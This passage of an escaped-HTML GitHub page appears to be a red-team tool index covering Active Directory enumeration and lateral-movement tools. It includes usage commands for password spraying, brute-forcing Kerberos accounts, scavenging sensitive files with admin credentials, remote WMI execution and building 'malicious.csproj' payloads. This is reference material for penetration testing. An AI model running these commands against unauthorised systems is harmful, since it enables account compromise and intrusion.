networks.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Pip)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump\"\u003e\u003cpre\u003epip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/dirkjanm/adidnsdump\ncd adidnsdump\npip install .\"\u003e\u003cpre\u003egit clone https://github.com/dirkjanm/adidnsdump\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e adidnsdump\npip install \u003cspan class=\"pl-c1\"\u003e.\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eThe tool requires \u003ccode\u003eimpacket\u003c/code\u003e and \u003ccode\u003ednspython\u003c/code\u003e to function. While the tool works with both Python 2 and 3, Python 3 support requires you to install \u003ca href=\"https://github.com/CoreSecurity/impacket\"\u003eimpacket from GitHub\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Display the zones in the domain where you are currently in\nadidnsdump -u icorp\\\\testuser --print-zones icorp-dc.internal.corp\n\n# Display all zones in the domain\nadidnsdump -u icorp\\\\testuser icorp-dc.internal.corp\n\n# Resolve all unknown records (-r)\nadidnsdump -u icorp\\\\testuser icorp-dc.internal.corp -r\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Display the zones in the domain where you are currently in\u003c/span\u003e\nadidnsdump -u icorp\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003etestuser --print-zones icorp-dc.internal.corp\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Display all zones in the domain\u003c/span\u003e\nadidnsdump -u icorp\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003etestuser icorp-dc.internal.corp\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Resolve all unknown records (-r)\u003c/span\u003e\nadidnsdump -u icorp\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003etestuser icorp-dc.internal.corp -r\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/\" rel=\"nofollow\"\u003eBlog - Getting in the Zone: dumping Active Directory DNS using adidnsdump\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210986363-724e6611-12e9-4a0d-abfa-c44665010b97.jpg\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210986363-724e6611-12e9-4a0d-abfa-c44665010b97.jpg\" alt=\"adidnsdump\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/\" rel=\"nofollow\"\u003ehttps://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/ropnop/kerbrute\"\u003ekerbrute\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-kerbrute\" class=\"anchor\" aria-label=\"Permalink: 🔙kerbrute\" href=\"#kerbrute\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Go)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"go get github.com/ropnop/kerbrute\"\u003e\u003cpre\u003ego get github.com/ropnop/kerbrute\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Make)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/ropnop/kerbrute\ncd kerbrute\nmake all\"\u003e\u003cpre\u003egit clone https://github.com/ropnop/kerbrute\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e kerbrute\nmake all\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# User Enumeration\n./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt\n\n# Password Spray\n./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123\n\n# Brute User\n./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman\n\n# Brute Force\n./kerbrute -d lab.ropnop.com bruteforce -\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e User Enumeration\u003c/span\u003e\n./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Password Spray\u003c/span\u003e\n./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Brute User\u003c/span\u003e\n./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Brute Force\u003c/span\u003e\n./kerbrute -d lab.ropnop.com bruteforce -\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/212205129-e5906b50-78c5-4507-8b1e-74a6686bed14.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/212205129-e5906b50-78c5-4507-8b1e-74a6686bed14.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://matthewomccorkle.github.io/day_032_kerbrute/\" rel=\"nofollow\"\u003ehttps://matthewomccorkle.github.io/day_032_kerbrute/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/SpiderLabs/scavenger\"\u003escavenger\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-scavenger\" class=\"anchor\" aria-label=\"Permalink: 🔙scavenger\" href=\"#scavenger\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eScavenger is a multi-threaded post-exploitation scanning tool for scavenging systems, finding most frequently used files and folders as well as \"interesting\" files containing sensitive information.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eScavenger confronts a challenging issue typically faced by Penetration Testing consultants during internal penetration tests; the issue of having too much access to too many systems with limited days for testing.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFirst install CrackMapExec from \u003ca href=\"https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/SpiderLabs/scavenger\ncd scavenger\"\u003e\u003cpre\u003egit clone https://github.com/SpiderLabs/scavenger\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e scavenger\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Search for interesting files on victim endpoint\npython3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Search for interesting files on victim endpoint\u003c/span\u003e\npython3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice \u003ca href=\"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/\" rel=\"nofollow\"\u003eblog post\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216736914-e7a7fe26-3531-4ae1-9962-fce130d8ab62.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216736914-e7a7fe26-3531-4ae1-9962-fce130d8ab62.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/\" rel=\"nofollow\"\u003ehttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eLateral Movement\u003c/h1\u003e\u003ca id=\"user-content-lateral-movement\" class=\"anchor\" aria-label=\"Permalink: Lateral Movement\" href=\"#lateral-movement\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Porchetta-Industries/CrackMapExec\"\u003ecrackmapexec\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-crackmapexec\" class=\"anchor\" aria-label=\"Permalink: 🔙crackmapexec\" href=\"#crackmapexec\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis is a great tool for pivoting in a Windows/Active Directory environment using credential pairs (username:password, username:hash). It also offered other features including enumerating logged on users and spidering SMB shares to executing psexec style attacks, auto-injecting Mimikatz/Shellcode/DLL’s into memory using Powershell, dumping the NTDS.dit and more.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt install crackmapexec\"\u003e\u003cpre\u003esudo apt install crackmapexec\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"crackmapexec smb \u0026lt;ip address\u0026gt; -d \u0026lt;domain\u0026gt; -u \u0026lt;user list\u0026gt; -p \u0026lt;password list\u0026gt;\"\u003e\u003cpre\u003ecrackmapexec smb \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eip address\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -d \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003edomain\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -u \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003euser list\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -p \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003epassword list\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192070626-4549ec06-e2c5-477b-a97d-0f29e48bbfbc.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192070626-4549ec06-e2c5-477b-a97d-0f29e48bbfbc.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/FortyNorthSecurity/WMIOps\"\u003eWMIOps\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-wmiops\" class=\"anchor\" aria-label=\"Permalink: 🔙WMIOps\" href=\"#wmiops\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eWMIOps is a powershell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDeveloped by \u003ca href=\"https://twitter.com/christruncer\" rel=\"nofollow\"\u003e@christruncer\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOriginal \u003ca href=\"https://www.christophertruncer.com/introducing-wmi-ops/\" rel=\"nofollow\"\u003eblog post\u003c/a\u003e documenting release.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (PowerShell)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/FortyNorthSecurity/WMIOps\nImport-Module WMIOps.ps1\"\u003e\u003cpre\u003egit clone https://github.com/FortyNorthSecurity/WMIOps\nImport-Module WMIOps.ps1\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Executes a user specified command on the target machine\nInvoke-ExecCommandWMI\n\n# Returns all running processes from the target machine\nGet-RunningProcessesWMI\n\n# Checks if a user is active at the desktop on the target machine (or if away from their machine)\nFind-ActiveUsersWMI\n\n# Lists all local and network connected drives on target system\nGet-SystemDrivesWMI\n\n# Executes a powershell script in memory on the target host via WMI and returns the output\nInvoke-RemoteScriptWithOutput\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Executes a user specified command on the target machine\u003c/span\u003e\nInvoke-ExecCommandWMI\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Returns all running processes from the target machine\u003c/span\u003e\nGet-RunningProcessesWMI\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Checks if a user is active at the desktop on the target machine (or if away from their machine)\u003c/span\u003e\nFind-ActiveUsersWMI\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Lists all local and network connected drives on target system\u003c/span\u003e\nGet-SystemDrivesWMI\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Executes a powershell script in memory on the target host via WMI and returns the output\u003c/span\u003e\nInvoke-RemoteScriptWithOutput\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266302-9c098f03-24fd-4f91-af63-db2fe04c01c7.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266302-9c098f03-24fd-4f91-af63-db2fe04c01c7.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266314-e51c7c99-1e2a-473e-926c-074b56fe79a5.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266314-e51c7c99-1e2a-473e-926c-074b56fe79a5.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImages used from \u003ca href=\"https://pentestlab.blog/2017/11/20/command-and-control-wmi/\" rel=\"nofollow\"\u003ehttps://pentestlab.blog/2017/11/20/command-and-control-wmi/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Mr-Un1k0d3r/PowerLessShell\"\u003ePowerLessShell\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-powerlessshell\" class=\"anchor\" aria-label=\"Permalink: 🔙PowerLessShell\" href=\"#powerlessshell\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTool that uses MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/Mr-Un1k0d3r/PowerLessShell\ncd PowerLessShell\"\u003e\u003cpre\u003egit clone https://github.com/Mr-Un1k0d3r/PowerLessShell\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e PowerLessShell\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Help\npython PowerLessShell.py -h\n\n# Generate PowerShell payload \npython PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj\n\n# Generating a shellcode payload\npython PowerLessShell.py -source shellcode.raw -output malicious.csproj\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Help\u003c/span\u003e\npython PowerLessShell.py -h\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate PowerShell payload \u003c/span\u003e\npython PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generating a shellcode payload\u003c/span\u003e\npython PowerLessShell.py -source shellcode.raw -output malicious.csproj\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/Mr-Un1k0d3r/PowerLessShell#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266357-75a3f09d-9855-46d5-ad13-69c677b4499f.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266357-75a3f09d-9855-46d5-ad13-69c677b4499f.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628\" rel=\"nofollow\"\u003ehttps://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://learn.microsoft.com/en-us/sysinternals/downloads/psexec\" rel=\"nofollow\"\u003ePsExec\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-psexec\" class=\"anchor\" aria-label=\"Permalink: 🔙PsExec\" href=\"#psexec\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 